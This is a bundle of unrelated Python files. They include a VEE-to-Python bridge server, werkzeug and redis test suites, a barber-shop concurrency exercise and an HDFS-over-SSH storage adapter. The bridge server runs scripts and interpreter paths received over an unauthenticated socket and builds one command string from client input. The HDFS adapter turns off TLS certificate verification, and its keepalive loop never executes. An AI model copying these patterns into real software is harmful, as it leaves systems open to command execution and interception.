class StdioTransport(Transport):
def __init__(self, log: core.Logger, command: List[str], cwd: Optional[str] = None):
log.log('transport', f'⟸ process/starting :: {command}')
self.process = Process(command, cwd)
thread = threading.Thread(target=self._read, args=(self.process.stderr, log.info))
thread.start()
def _read(self, file: Any, callback: Callable[[str], None]) -> None:
while True:
try:
line = file.read(2**15).decode('UTF-8')
if not line:
core.log_info('Nothing to read from process, closing')
break
core.call_soon_threadsafe(callback, line)
except Exception as e:
core.log_exception()
break
self.process.dispose()
def write(self, message: bytes) -> None:
self.process.stdin.write(message)
self.process.stdin.flush()
def readline(self) -> bytes:
if l := self.process.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.process.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
self.process.dispose()
class SocketTransport(Transport):
def __init__(self, log: core.Logger, host: str, port: int, cwd: Optional[str] = None):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((host, port))
self.stdin = self.socket.makefile('wb')
self.stdout = self.socket.makefile('rb')
def write(self, message: bytes) -> None:
self.stdin.write(message)
self.stdin.flush()
def readline(self) -> bytes:
if l := self.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
try:
self.socket.close()
except:
core.log_exception()
|
server.py
|
from VEEParser import read_string, send_record
from VEEParser import send_string, PYTHON_TO_VEE_TYPES, read_script, R_TO_PYTHON_TYPES
import socket
import argparse
import subprocess
import threading
import os
import uuid
from bridgescripts import BRIDGE_SCRIPTS
import tempfile
from client import Client
PROTOCOLS = set(("DATA","SCRIPT", "SERVERSHUTDOWNTIMEOUT", "GETRESULT", "HALT", "EXECUTE", "BRIDGE", "STATUS", "QUIT"))
client_list = dict()
TIMEOUT = 120
TIMEOUTENABLE = True
HEADER_SIZE = 22
DEBUG = 1
PYTHON_PATH = '.\\python.exe'
def handle_new_client(conn,s, HOST, PORT):
global PROTOCOLS, PYTHON_TO_VEE_TYPES, HEADER_SIZE, DEBUG, PYTHON_PATH
client = Client(str(uuid.uuid4()))
client_list[client.id] = client
while conn:
try:
recieved_message = conn.recv(HEADER_SIZE) # String given by VEEPro, print this for debugging
except:
conn.close()
break
if(DEBUG):
print(repr(recieved_message))
recieved_message = recieved_message.decode().strip()
if(not recieved_message):
break
if(recieved_message in PROTOCOLS): # Check if the recieved Message is a protocol
client.protocol = recieved_message
else:
conn.send(send_string("Incorrect Protocol").encode("utf-8"))
continue
if(client.protocol == "DATA"):
conn.send(send_string("SEND").encode())
recievedSize = conn.recv(11).decode("utf-8")
size = int(recievedSize)
conn.send(send_string("SIZE").encode())
recievedContainer = conn.recv(size + 100)
recievedContainer = recievedContainer.decode()
if(DEBUG):
print(repr(recievedContainer))
lines = recievedContainer.split("\n")
for line in lines:
if(line != ''):
client.search_string += line + '\n'
try:
client.input_data = read_string(client.search_string)
except TypeError as err:
client.error[0] = True
client.error[1] = err.args[0]
client.search_string = ''
client.protocol = ''
conn.send(send_string("OK").encode())
elif(client.protocol == "SCRIPT"):
conn.send(send_string("SIZE").encode())
recievedSize = conn.recv(11).decode("utf-8")
size = int(recievedSize)
conn.send(send_string("SEND").encode())
recievedContainer = conn.recv(size + 100).decode("utf-8")
lines = recievedContainer.split("\n")
for line in lines:
if('[' in line):
client.script_string = read_script(line)
if("#!" in client.script_string[:4]):
client.commands = client.script_string.partition('\n')[0][2:].strip().split(" ",1)
client.commands[0] = client.commands[0].lower()
client.script_string = client.script_string.partition('\n')[2] # remove first line of script
else:
client.commands = tuple(["python"])
conn.send(send_string("OK").encode())
elif(client.protocol == "EXECUTE"):
if(not client.script_string or not client.input_data):
sendString = send_string(client.error[1])
conn.send(sendString.encode("utf-8"))
continue
else:
if("python" in client.commands[0]):
if(len(client.commands) > 1):
if(os.path.basename(client.commands[1]) != "python.exe"):
conn.send(send_string("Incorrect filepath").encode("utf-8"))
continue
if(os.path.exists(client.commands[1])):
client.running = subprocess.Popen([client.commands[1], f'{tempfile.gettempdir()}\\bridge_python.py',
client.id, f'--host={HOST}', f'--port={PORT}'])
else:
conn.send(send_string("Invalid Path").encode("utf-8"))
continue
else:
client.running = subprocess.Popen([PYTHON_PATH, f'{tempfile.gettempdir()}\\bridge_python.py',
client.id, f'--host={HOST}', f'--port={PORT}'])
if("fiji" in client.commands[0]):
if((os.path.basename(client.commands[1]) != "ImageJ-win64.exe") and (os.path.basename(client.commands[1]) != "ImageJ-win32.exe")):
conn.send(send_string("Invalid Path").encode("utf-8"))
continue
filePath = client.commands[1]
command = f'{filePath} --ij2 --run "{tempfile.gettempdir()}\\bridge_jython.py" "id=\'{client.id}\', host=\'{HOST}\', port={PORT}"'
client.running = subprocess.Popen(command)
if("r" in client.commands[0]):
invalid = False
for item in client.input_data:
if(not client.input_data[item][2]):
conn.send(send_string(f"{item} not an array").encode())
invalid = True
if(invalid):
continue
if(os.path.basename(client.commands[1]) != "R.exe"):
conn.send(send_string("Incorrect filepath").encode("utf-8"))
continue
file_path = client.commands[1]
cmd = f"{file_path} --ess --vanilla --args {client.id} {HOST} {PORT}"
client.running = subprocess.Popen(cmd, stdin=subprocess.PIPE,stdout=subprocess.PIPE)
r_thread = threading.Thread(target=client.summon_r, daemon=True)
r_thread.start()
if("octave" in client.commands[0]):
if(os.path.basename(client.commands[1]) != "octave-gui.exe"):
conn.send(send_string("Incorrect filepath").encode("utf-8"))
continue
client.running = subprocess.Popen([PYTHON_PATH, f'{tempfile.gettempdir()}\\bridge_octave.py',
client.id, f'--host={HOST}', f'--port={PORT}'])
if("maxima" in client.commands[0]):
if(os.path.basename(client.commands[1]) != "maxima.bat"):
conn.send(send_string("Incorrect filepath").encode("utf-8"))
continue
client.running = subprocess.Popen([PYTHON_PATH, f'{tempfile.gettempdir()}\\bridge_maxima.py',
client.id, f'--host={HOST}', f'--port={PORT}'])
sendString = send_string("OK")
conn.send(sendString.encode("utf-8"))
elif(client.protocol == "STATUS"):
if(client.error[0]):
sendString = send_string(client.error[1])
conn.send(sendString.encode("utf-8"))
else:
if(client.running):
if(client.running.poll() is None):
conn.send(send_string("BUSY").encode("utf-8"))
else:
conn.send(send_string("OK").encode("utf-8"))
else:
conn.send(send_string("OK").encode("utf-8"))
elif(client.protocol == "GETRESULT"):
if(client.error[0]):
sendString = send_string(client.error[1])
conn.send(sendString.encode("utf-8"))
else:
if(DEBUG):
print(repr(client.output_data))
sendString = send_record(client.output_data)
sendBuffSize = str(len(sendString)) + "\n"
sendToVEE = sendBuffSize + sendString
conn.send(sendToVEE.encode())
if(DEBUG):
print(repr(sendToVEE))
elif(recieved_message == "BRIDGE"): # Bridge protocol (Reserved for Bridgescripts)
del client_list[client.id] # deletes client from client_list as EXECUTE is a not a "real" new client
del client
conn.send(b'OK') # Send OK back
recievedID = conn.recv(36).decode('utf-8') # Get real Client ID
currentClient = client_list[recievedID]
python_bridges = ["python", "embed", "fiji", "maxima"]
if(currentClient.commands[0] in python_bridges):
currentClient.python_bridge(conn)
if(currentClient.commands[0] == "r"):
currentClient.r_bridge(conn)
if(currentClient.commands[0] == "octave"):
currentClient.octave_bridge(conn)
conn.close()
break
elif(recieved_message == "SERVERSHUTDOWNTIMEOUT"):
conn.send(send_string("OK").encode("utf-8"))
recievedSize = int(conn.recv(11).decode("utf-8"))
s.settimeout(recievedSize)
conn.send(send_string("OK").encode("utf-8"))
elif(client.protocol == "QUIT"):
cleanup()
conn.send(send_string("OK").encode("utf-8"))
print("Shutting down server...")
conn.close()
s.close()
break
elif(client.protocol == "HALT"):
conn.send(send_string("OK").encode("utf-8"))
print("Closing Connection...")
del client_list[client.id]
del client
conn.close()
break
def cleanup():
for key in BRIDGE_SCRIPTS:
if(os.path.exists(f'{tempfile.gettempdir()}\\bridge_{key}.{BRIDGE_SCRIPTS[key][1]}')):
os.remove(f'{tempfile.gettempdir()}\\bridge_{key}.{BRIDGE_SCRIPTS[key][1]}')
def main(host, port):
global PROTOCOLS, BRIDGE_SCRIPTS, TIMEOUT, TIMEOUTENABLE
for key in BRIDGE_SCRIPTS:
bridgeFile = open(f'{tempfile.gettempdir()}\\bridge_{key}.{BRIDGE_SCRIPTS[key][1]}','w')
bridgeFile.write(BRIDGE_SCRIPTS[key][0])
bridgeFile.close()
isConnected = True
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
try:
if(TIMEOUTENABLE):
s.settimeout(TIMEOUT)
s.bind((host, port))
print(f'Binded on host = {host} and port = {port}')
print("Listening...")
s.listen()
except Exception as msg:
print('An error occurred:\n' + str(msg))
send_string('An error occurred: ' + str(msg))
isConnected = False
# This while loop means the server is continuously running
while (isConnected):
try:
conn, addr = s.accept() # Waiting for a connection from VEEPro (async)
t1 = threading.Thread(target=handle_new_client, args=(conn,s,host,port,))
t1.daemon = True
t1.start()
except socket.timeout:
print("TIMED OUT")
cleanup()
s.close()
break
except OSError:
cleanup()
s.close()
break
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Initate the VEE to Python server connection')
parser.add_argument('--host', default='127.0.0.1', help="Connect to a specific host. Default is 127.0.0.1 (localhost).")
parser.add_argument('--port', default=65433, type=int, help="Port to connect to server. Default is 65433.")
args = parser.parse_args()
main(args.host, args.port)
|
test_local.py
|
import asyncio
import copy
import math
import operator
import sys
import time
from functools import partial
from threading import Thread
import pytest
from werkzeug import local
def test_basic_local():
ns = local.Local()
ns.foo = 0
values = []
def value_setter(idx):
time.sleep(0.01 * idx)
ns.foo = idx
time.sleep(0.02)
values.append(ns.foo)
threads = [Thread(target=value_setter, args=(x,)) for x in [1, 2, 3]]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert sorted(values) == [1, 2, 3]
def delfoo():
del ns.foo
delfoo()
pytest.raises(AttributeError, lambda: ns.foo)
pytest.raises(AttributeError, delfoo)
local.release_local(ns)
@pytest.mark.skipif(
sys.version_info < (3, 7),
reason="Locals are not task local in Python 3.6",
)
def test_basic_local_asyncio():
ns = local.Local()
ns.foo = 0
values = []
async def value_setter(idx):
await asyncio.sleep(0.01 * idx)
ns.foo = idx
await asyncio.sleep(0.02)
values.append(ns.foo)
loop = asyncio.get_event_loop()
futures = [asyncio.ensure_future(value_setter(idx)) for idx in [1, 2, 3]]
loop.run_until_complete(asyncio.gather(*futures))
assert sorted(values) == [1, 2, 3]
def delfoo():
del ns.foo
delfoo()
pytest.raises(AttributeError, lambda: ns.foo)
pytest.raises(AttributeError, delfoo)
local.release_local(ns)
def test_local_release():
ns = local.Local()
ns.foo = 42
local.release_local(ns)
assert not hasattr(ns, "foo")
ls = local.LocalStack()
ls.push(42)
local.release_local(ls)
assert ls.top is None
def test_local_stack():
ls = local.LocalStack()
assert ls.top is None
ls.push(42)
assert ls.top == 42
ls.push(23)
assert ls.top == 23
ls.pop()
assert ls.top == 42
ls.pop()
assert ls.top is None
assert ls.pop() is None
assert ls.pop() is None
proxy = ls()
ls.push([1, 2])
assert proxy == [1, 2]
ls.push((1, 2))
assert proxy == (1, 2)
ls.pop()
ls.pop()
assert repr(proxy) == "<LocalProxy unbound>"
@pytest.mark.skipif(
sys.version_info > (3, 6),
reason="The ident is not supported in Python3.7 or higher",
)
def test_custom_idents():
ident = 0
ns = local.Local()
stack = local.LocalStack()
local.LocalManager([ns, stack], ident_func=lambda: ident)
ns.foo = 42
stack.push({"foo": 42})
ident = 1
ns.foo = 23
stack.push({"foo": 23})
ident = 0
assert ns.foo == 42
assert stack.top["foo"] == 42
stack.pop()
assert stack.top is None
ident = 1
assert ns.foo == 23
assert stack.top["foo"] == 23
stack.pop()
assert stack.top is None
def test_proxy_local():
ns = local.Local()
ns.foo = []
p = local.LocalProxy(ns, "foo")
p.append(42)
p.append(23)
p[1:] = [1, 2, 3]
assert p == [42, 1, 2, 3]
assert p == ns.foo
ns.foo += [1]
assert list(p) == [42, 1, 2, 3, 1]
p_from_local = ns("foo")
p_from_local.append(2)
assert p == p_from_local
assert p._get_current_object() is ns.foo
def test_proxy_callable():
value = 42
p = local.LocalProxy(lambda: value)
assert p == 42
value = [23]
p.append(42)
assert p == [23, 42]
assert value == [23, 42]
assert p._get_current_object() is value
def test_proxy_wrapped():
class SomeClassWithWrapped:
__wrapped__ = "wrapped"
def lookup_func():
return 42
proxy = local.LocalProxy(lookup_func)
assert proxy.__wrapped__ is lookup_func
partial_lookup_func = partial(lookup_func)
partial_proxy = local.LocalProxy(partial_lookup_func)
assert partial_proxy.__wrapped__ == partial_lookup_func
ns = local.Local()
ns.foo = SomeClassWithWrapped()
ns.bar = 42
assert ns("foo").__wrapped__ == "wrapped"
pytest.raises(AttributeError, lambda: ns("bar").__wrapped__)
def test_proxy_doc():
def example():
"""example doc"""
assert local.LocalProxy(lambda: example).__doc__ == "example doc"
# The __doc__ descriptor shouldn't block the LocalProxy's class doc.
assert local.LocalProxy.__doc__.startswith("A proxy")
def test_proxy_unbound():
ns = local.Local()
p = ns("value")
assert repr(p) == "<LocalProxy unbound>"
assert not p
assert dir(p) == []
def _make_proxy(value):
ns = local.Local()
ns.value = value
p = ns("value")
return ns, p
def test_proxy_type():
_, p = _make_proxy([])
assert isinstance(p, list)
assert p.__class__ is list
assert issubclass(type(p), local.LocalProxy)
assert type(p) is local.LocalProxy
def test_proxy_string_representations():
class Example:
def __repr__(self):
return "a"
def __bytes__(self):
return b"b"
def __index__(self):
return 23
_, p = _make_proxy(Example())
assert str(p) == "a"
assert repr(p) == "a"
assert bytes(p) == b"b"
# __index__
assert bin(p) == "0b10111"
assert oct(p) == "0o27"
assert hex(p) == "0x17"
def test_proxy_hash():
ns, p = _make_proxy("abc")
assert hash(ns.value) == hash(p)
@pytest.mark.parametrize(
"op",
[
operator.lt,
operator.le,
operator.eq,
operator.ne,
operator.gt,
operator.ge,
operator.add,
operator.sub,
operator.mul,
operator.truediv,
operator.floordiv,
operator.mod,
divmod,
pow,
operator.lshift,
operator.rshift,
operator.and_,
operator.or_,
operator.xor,
],
)
def test_proxy_binop_int(op):
_, p = _make_proxy(2)
assert op(p, 3) == op(2, 3)
# r-op
assert op(3, p) == op(3, 2)
@pytest.mark.parametrize("op", [operator.neg, operator.pos, abs, operator.invert])
def test_proxy_uop_int(op):
_, p = _make_proxy(-2)
assert op(p) == op(-2)
def test_proxy_numeric():
class Example:
def __complex__(self):
return 1 + 2j
def __int__(self):
return 1
def __float__(self):
return 2.1
def __round__(self, n=None):
if n is not None:
return 3.3
return 3
def __trunc__(self):
return 4
def __floor__(self):
return 5
def __ceil__(self):
return 6
def __index__(self):
return 2
_, p = _make_proxy(Example())
assert complex(p) == 1 + 2j
assert int(p) == 1
assert float(p) == 2.1
assert round(p) == 3
assert round(p, 2) == 3.3
assert math.trunc(p) == 4
assert math.floor(p) == 5
assert math.ceil(p) == 6
assert [1, 2, 3][p] == 3 # __index__
@pytest.mark.parametrize(
"op",
[
operator.iadd,
operator.isub,
operator.imul,
operator.imatmul,
operator.itruediv,
operator.ifloordiv,
operator.imod,
operator.ipow,
operator.ilshift,
operator.irshift,
operator.iand,
operator.ior,
operator.ixor,
],
)
def test_proxy_iop(op):
class Example:
value = 1
def fake_op(self, other):
self.value = other
return self
__iadd__ = fake_op
__isub__ = fake_op
__imul__ = fake_op
__imatmul__ = fake_op
__itruediv__ = fake_op
__ifloordiv__ = fake_op
__imod__ = fake_op
__ipow__ = fake_op
__ilshift__ = fake_op
__irshift__ = fake_op
__iand__ = fake_op
__ior__ = fake_op
__ixor__ = fake_op
ns, p = _make_proxy(Example())
p_out = op(p, 2)
assert type(p_out) is local.LocalProxy
assert p.value == 2
assert ns.value.value == 2
def test_proxy_matmul():
class Example:
def __matmul__(self, other):
return 2 * other
def __rmatmul__(self, other):
return 2 * other
_, p = _make_proxy(Example())
assert p @ 3 == 6
assert 4 @ p == 8
def test_proxy_str():
_, p = _make_proxy("{act} %s")
assert p + " world" == "{act} %s world"
assert "say " + p == "say {act} %s"
assert p * 2 == "{act} %s{act} %s"
assert 2 * p == p * 2
assert p % ("world",) == "{act} world"
assert p.format(act="test") == "test %s"
def test_proxy_list():
_, p = _make_proxy([1, 2, 3])
assert len(p) == 3
assert p[0] == 1
assert 3 in p
assert 4 not in p
assert tuple(p) == (1, 2, 3)
assert list(reversed(p)) == [3, 2, 1]
p[0] = 4
assert p == [4, 2, 3]
del p[-1]
assert p == [4, 2]
p += [5]
assert p[-1] == 5
p *= 2
assert len(p) == 6
p[:] = []
assert not p
p.append(1)
assert p
assert p + [2] == [1, 2]
assert [2] + p == [2, 1]
def test_proxy_copy():
class Foo:
def __copy__(self):
return self
def __deepcopy__(self, memo):
return self
ns, p = _make_proxy(Foo())
assert copy.copy(p) is ns.value
assert copy.deepcopy(p) is ns.value
a = []
_, p = _make_proxy([a])
assert copy.copy(p) == [a]
assert copy.copy(p)[0] is a
assert copy.deepcopy(p) == [a]
assert copy.deepcopy(p)[0] is not a
def test_proxy_iterator():
a = [1, 2, 3]
_, p = _make_proxy(iter(a))
assert next(p) == 1
def test_proxy_length_hint():
class Example:
def __length_hint__(self):
return 2
_, p = _make_proxy(Example())
assert operator.length_hint(p) == 2
def test_proxy_context_manager():
class Example:
value = 2
def __enter__(self):
self.value += 1
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.value -= 1
_, p = _make_proxy(Example())
assert p.value == 2
with p:
assert p.value == 3
assert p.value == 2
def test_proxy_class():
class Meta(type):
def __instancecheck__(cls, instance):
return True
def __subclasscheck__(cls, subclass):
return True
class Parent:
pass
class Example(Parent, metaclass=Meta):
pass
class Child(Example):
pass
_, p = _make_proxy(Example)
assert type(p()) is Example
assert isinstance(1, p)
assert issubclass(int, p)
assert p.__mro__ == (Example, Parent, object)
assert p.__bases__ == (Parent,)
assert p.__subclasses__() == [Child]
def test_proxy_attributes():
class Example:
def __init__(self):
object.__setattr__(self, "values", {})
def __getattribute__(self, name):
if name == "ham":
return "eggs"
return super().__getattribute__(name)
def __getattr__(self, name):
return self.values.get(name)
def __setattr__(self, name, value):
self.values[name] = value
def __delattr__(self, name):
del self.values[name]
def __dir__(self):
return sorted(self.values.keys())
_, p = _make_proxy(Example())
assert p.nothing is None
assert p.__dict__ == {"values": {}}
assert dir(p) == []
p.x = 1
assert p.x == 1
assert dir(p) == ["x"]
del p.x
assert dir(p) == []
assert p.ham == "eggs"
p.ham = "spam"
assert p.ham == "eggs"
assert p.values["ham"] == "spam"
def test_proxy_await():
async def get():
return 1
_, p = _make_proxy(get())
async def main():
return await p
out = asyncio.get_event_loop().run_until_complete(main())
assert out == 1
def test_proxy_aiter():
class Example:
value = 3
def __aiter__(self):
return self
async def __anext__(self):
if self.value:
self.value -= 1
return self.value
raise StopAsyncIteration
_, p = _make_proxy(Example())
async def main():
out = []
async for v in p:
out.append(v)
return out
out = asyncio.get_event_loop().run_until_complete(main())
assert out == [2, 1, 0]
def test_proxy_async_context_manager():
class Example:
value = 2
async def __aenter__(self):
self.value += 1
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
self.value -= 1
_, p = _make_proxy(Example())
async def main():
async with p:
assert p.value == 3
assert p.value == 2
return True
assert asyncio.get_event_loop().run_until_complete(main())
|
main.py
|
# TODO: check this solution!
from threading import Semaphore, Thread, Lock
from collections import deque
io = Lock()
hey_barber = Semaphore(0)
room = Semaphore(1)
standing = deque()
sitting = deque()
serviced = 0
cashdesk = Semaphore(1)
paying = 0
satisfied = Semaphore(0)
done = Semaphore(0)
def customer_worker():
global serviced, paying
you_next = Semaphore(0)
with room:
if len(sitting) + len(standing) + serviced >= 20:
return
elif len(sitting) >= 4:
standing.append(you_next)
else:
sitting.append(you_next)
hey_barber.release()
you_next.acquire()
# Being cut...
satisfied.release()
with room:
serviced -= 1
paying += 1
with cashdesk:
hey_barber.release()
# Paying...
done.acquire()
def barber_worker():
global serviced, paying
while True:
hey_barber.acquire()
with room:
with io: print('awoken', ';', 'standing:', len(standing), ';', 'sitting:', len(sitting), ';', end=' ')
if paying:
with io: print('accepting payment')
# Accepting payment...
paying -= 1
done.release()
continue
else:
with io: print('doing haircut')
you_next = sitting.popleft()
serviced += 1
if standing:
sitting.append(standing.popleft())
hey_barber.release()
you_next.release()
# Cutting...
satisfied.acquire()
threads = (
[Thread(target=customer_worker) for _ in range(200)] +
[Thread(target=barber_worker) for _ in range(3)]
)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
test_multiprocessing.py
|
import pytest
import multiprocessing
import contextlib
import redis
from redis.connection import Connection, ConnectionPool
from redis.exceptions import ConnectionError
from .conftest import _get_client
@contextlib.contextmanager
def exit_callback(callback, *args):
try:
yield
finally:
callback(*args)
class TestMultiprocessing(object):
# Test connection sharing between forks.
# See issue #1085 for details.
# use a multi-connection client as that's the only type that is
# actually fork/process-safe
@pytest.fixture()
def r(self, request):
return _get_client(
redis.Redis,
request=request,
single_connection_client=False)
def test_close_connection_in_child(self, master_host):
"""
A connection owned by a parent and closed by a child doesn't
destroy the file descriptors so a parent can still use it.
"""
conn = Connection(host=master_host)
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(conn):
conn.send_command('ping')
assert conn.read_response() == b'PONG'
conn.disconnect()
proc = multiprocessing.Process(target=target, args=(conn,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
# The connection was created in the parent but disconnected in the
# child. The child called socket.close() but did not call
# socket.shutdown() because it wasn't the "owning" process.
# Therefore the connection still works in the parent.
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def test_close_connection_in_parent(self, master_host):
"""
A connection owned by a parent is unusable by a child if the parent
(the owning process) closes the connection.
"""
conn = Connection(host=master_host)
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(conn, ev):
ev.wait()
# the parent closed the connection. because it also created the
# connection, the connection is shutdown and the child
# cannot use it.
with pytest.raises(ConnectionError):
conn.send_command('ping')
ev = multiprocessing.Event()
proc = multiprocessing.Process(target=target, args=(conn, ev))
proc.start()
conn.disconnect()
ev.set()
proc.join(3)
assert proc.exitcode == 0
@pytest.mark.parametrize('max_connections', [1, 2, None])
def test_pool(self, max_connections, master_host):
"""
A child will create its own connections when using a pool created
by a parent.
"""
pool = ConnectionPool.from_url('redis://{}'.format(master_host),
max_connections=max_connections)
conn = pool.get_connection('ping')
main_conn_pid = conn.pid
with exit_callback(pool.release, conn):
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(pool):
with exit_callback(pool.disconnect):
conn = pool.get_connection('ping')
assert conn.pid != main_conn_pid
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
proc = multiprocessing.Process(target=target, args=(pool,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
# Check that connection is still alive after fork process has exited
# and disconnected the connections in its pool
conn = pool.get_connection('ping')
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
@pytest.mark.parametrize('max_connections', [1, 2, None])
def test_close_pool_in_main(self, max_connections, master_host):
"""
A child process that uses the same pool as its parent isn't affected
when the parent disconnects all connections within the pool.
"""
pool = ConnectionPool.from_url('redis://{}'.format(master_host),
max_connections=max_connections)
conn = pool.get_connection('ping')
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
def target(pool, disconnect_event):
conn = pool.get_connection('ping')
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
disconnect_event.wait()
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
ev = multiprocessing.Event()
proc = multiprocessing.Process(target=target, args=(pool, ev))
proc.start()
pool.disconnect()
ev.set()
proc.join(3)
assert proc.exitcode == 0
def test_redis_client(self, r):
"A redis client created in a parent can also be used in a child"
assert r.ping() is True
def target(client):
assert client.ping() is True
del client
proc = multiprocessing.Process(target=target, args=(r,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
assert r.ping() is True
|
hdfsoverssh.py
|
"""
WebHDFS based LVFS Adapter
==========================
This module is extremely flexible and supports many modes of operation but configuring it properly
can be challenging. Most of the time you will only need a few common configurations. Refer to the
project homepage for examples. Your company may also have recommended configurations, so check for
internal corporate documentation as well.
"""
from collections import namedtuple
import subprocess
import secrets
import time
import logging
import atexit
from typing import List, Optional
from threading import Thread
import hdfs
import requests
try:
from requests_gssapi import HTTPSPNEGOAuth
except ModuleNotFoundError as err:
HTTPSPNEGOAuth = err
from lvfs.url import URL
from lvfs.stat import Stat
from lvfs.credentials import Credentials
def _wrap_error(method):
""" Wrap a function that throws HDFSError
so that it throws the right IOErrors instead """
async def inner(*args, **kwargs):
try:
return await method(*args, **kwargs)
except hdfs.util.HdfsError as err:
if "not found" in err.message:
raise FileNotFoundError from err
elif "not a directory" in err.message:
raise NotADirectoryError from err
elif "is a directory" in err.message:
raise IsADirectoryError from err
raise IOError from err
return inner
HoSCreds = namedtuple("HoSCreds", [
"username",
"password",
"ssh_username",
"ssh_jump_host",
"webhdfs_root"
])
class HDFSOverSSH(URL):
""" Connect to HDFS via the CLI on the other end of an SSH tunnel """
__tunnel: Optional[subprocess.Popen] = None
__tunnel_port: Optional[int] = None
__client: Optional[hdfs.InsecureClient] = None
__canary: Optional[Thread] = None
@classmethod
def __creds(cls):
# For the time being, we only support protocol-level credential realms
creds = Credentials.match(classname="HDFSOverSSH")
ssh_jump_host = creds.get("ssh_jump_host")
ssh_username = creds.get("ssh_username")
username = creds.get("username")
password = creds.get("password")
webhdfs_root = creds.get("webhdfs_root")
#
# See module level docstring for details on what this is doing.
#
if (ssh_jump_host is None) != (ssh_username is None):
raise ValueError(
"HDFSOverSSH needs either both ssh_jump_host and ssh_username or neither."
f" For more information, see below:\n\n{__doc__}"
)
if username == "kerberos" and password is not None:
raise ValueError(
"HDFSOverSSH with kerberos doesn't support using passwords, which are only for AD"
f" For more information, see below:\n\n{__doc__}"
)
if not webhdfs_root:
raise ValueError(
"HDFSOverSSH is missing webhdfs_root."
" You probably need to update your lvfs.yml for new changes with HDP3."
f" For more information, see below:\n\n{__doc__}"
)
return HoSCreds(username, password, ssh_username, ssh_jump_host, webhdfs_root)
@classmethod
def __setup_ssh_tunnel(cls):
""" Setup an SSH SOCKS5 proxy.
An proxy is not always required, so don't assume self.__tunnel exists.
Returns
-------
int
The port number associated with the proxy
"""
#
# Check if the tunnel is already setup and skip if it is.
#
if cls.__tunnel is None or cls.__tunnel.poll() is not None:
if cls.__tunnel is not None:
# The tunnel has died. Collect the zombie process.
logging.info("HDFS SSH tunnel disconnected. Reconnecting.")
cls.__tunnel.wait()
# Start SSH to get the tunnel going
cls.__tunnel_port = 30000 + secrets.randbelow(20000)
cls.__tunnel = subprocess.Popen([
"ssh", "-N", "-D", str(cls.__tunnel_port),
f"{cls.__creds().ssh_username}@{cls.__creds().ssh_jump_host}"
])
def deltunnel():
""" Promptly disconnect the SSH tunnel when exiting Python,
to avoid resource leaks
"""
cls.__tunnel.terminate()
cls.__tunnel.wait()
atexit.register(deltunnel) # This will run this function when python exits
def canary():
""" Occasionally send small requests to keep the SSH tunnel open and avoid it
getting disconnected due to inactivity.
No special work is necessary to rebuild the connection. If the connection
was lost, it will be reconnected automatically as a result of this request.
This can also help diagnose problems quickly if network issues arise with any
long running process that may be idle a while (like APIs or event listeners)
"""
while time.sleep(25):
try:
URL.to("hdfs://").stat()
except IOError as ioe:
raise RuntimeError("HDFS keepalive canary died") from ioe
if cls.__canary is None or not cls.__canary.is_alive():
cls.__canary = Thread(daemon=True, target=canary)
cls.__canary.start()
return cls.__tunnel_port
@classmethod
def __connect(cls):
""" Connect to HDFS, configured as required in lvfs.yml.
This may or may not start an SSH tunnel.
Returns
-------
hdfs.Client or a subclass of it
A client connected to HDFS.
Despite the name InsecureClient, it may actually be secure if configured properly.
"""
#
# Check the tunnel is running if necessary
#
creds = cls.__creds()
session = requests.Session()
if creds.ssh_username:
# This connection requires SSH tunneling
port = cls.__setup_ssh_tunnel()
session.proxies = {
"http": f"socks5://localhost:{port}",
"https": f"socks5://localhost:{port}"
}
# If the tunnel is still fine and the client is already built, then
# just return the client immediately, probably everything is fine.
# Otherwise move on to setting up the client.
if cls.__client is not None:
return cls.__client
#
# Setup Authentication
#
if creds.username == "kerberos":
# This connection uses Kerberos authentication
if isinstance(HTTPSPNEGOAuth, Exception):
raise RuntimeError(
"requests-gssapi is not installed so Kerberos is not enabled."
" Install it, or install lvfs[all] to support all optional features."
) from HTTPSPNEGOAuth
session.auth = HTTPSPNEGOAuth()
elif creds.username is not None and creds.password is not None:
# This connection uses AD authentication
session.auth = requests.auth.HTTPBasicAuth(creds.username, creds.password)
# Unfortunately it seems the certificates are self signed so we will have to ignore that
session.verify = False
cls.__client = hdfs.InsecureClient(
url=creds.webhdfs_root,
# This is not actually authenticated, it's trusted, you just pick a user.
# It's done through a "user" parameter.
# It is not used if you are also using AD or Kerberos, and it could cause
# problems if you do so we avoid using that if AD or Kerberos is enabled
user=(
creds.username
if creds.username not in ("kerberos", None) and creds.password is None
else None
),
session=session
)
if cls.__tunnel is not None:
# Allow three seconds before the first check, only if using SSH
time.sleep(3)
for trials in range(10):
# Try connecting immediately so that we catch connection errors immediately
# rather than way later when they could be more difficult to spot
try:
cls.__client.list("/")
break
except requests.exceptions.ConnectionError as err:
if trials == 9:
# If this fails, at least 9 seconds have passed
# so the error is probably real.
raise err
time.sleep(1)
return cls.__client
@_wrap_error
async def read_binary(self) -> bytes:
""" Read a file to a string of bytes """
with self.__connect().read(self.path) as reader:
return reader.read()
@_wrap_error
async def write_binary(self, content: bytes, overwrite: bool = True):
""" Write a whole file from bytes, overwriting if necessary
Accepts
-------
content : bytes
The bytestring to write into this new file, or to replace the previous file content
overwrite : bool
Whether to overwrite the file, if it exists.
"""
